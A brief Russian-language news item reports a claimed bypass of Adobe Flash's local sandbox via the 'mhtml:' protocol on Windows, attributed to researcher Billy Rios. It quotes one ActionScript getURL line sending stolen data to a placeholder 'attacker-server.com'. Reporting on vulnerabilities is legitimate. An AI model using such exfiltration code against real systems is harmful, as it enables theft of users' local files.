00:27 А ларчик просто открывался: обход «песочницы» Flash | |
Как известно, в конце 2010 года, компания Adobe предприняла ряд мер, для повышения уровня безопасности в своих продуктах и предусмотрела некоторые меры по защите доступа к сети. Одной из мер является встроенная в приложение так называемая «песочница», благодаря которой осуществляется контроль доступа к сети через черный список. В этот список включены заголовки протоколов, например HTTP и HTTPS. Однако, как стало известно, предпринятые меры не на долго позволили пользователям наслаждаться чувством "защищённости". Исследователь в области безопасности Билли Риос, утверждает, что можно отправлять файлы на сервер, используя в заголовках запись «file:», но в этом случае данные будут гулять по локальной сети. А для отправки данных на удаленный сервер, по его мнению, вполне подойдет заголовок – mhtml. Этот заголовок по умолчанию поддерживается в операционных системах семейства Windows, и поэтому данные могут быть отправлены при помощи ActionScript команды: «getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);». Стоит заметить, что для подтверждения своей гипотезы специалист не привел никаких демонстрационных материалов. Однако, удивительно, что настолько легко и просто можно обойти одну из «песочниц» Flash. По мнению экспертов, это открытие не представляет серьезной опасности, поскольку вряд ли пользователи будут специально скачивать себе на компьютер SWF файл, чтобы просмотреть через плеер. Обычно, такие файлы просматриваются в обозревателе, где предусмотрен иной набор правил. | |
|
Всего комментариев: 0 | |